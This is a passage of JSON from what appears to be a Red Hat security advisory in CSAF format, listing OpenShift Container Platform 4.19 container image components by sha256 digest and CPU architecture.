"product_reference": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64"
},
"product_reference": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x"
},
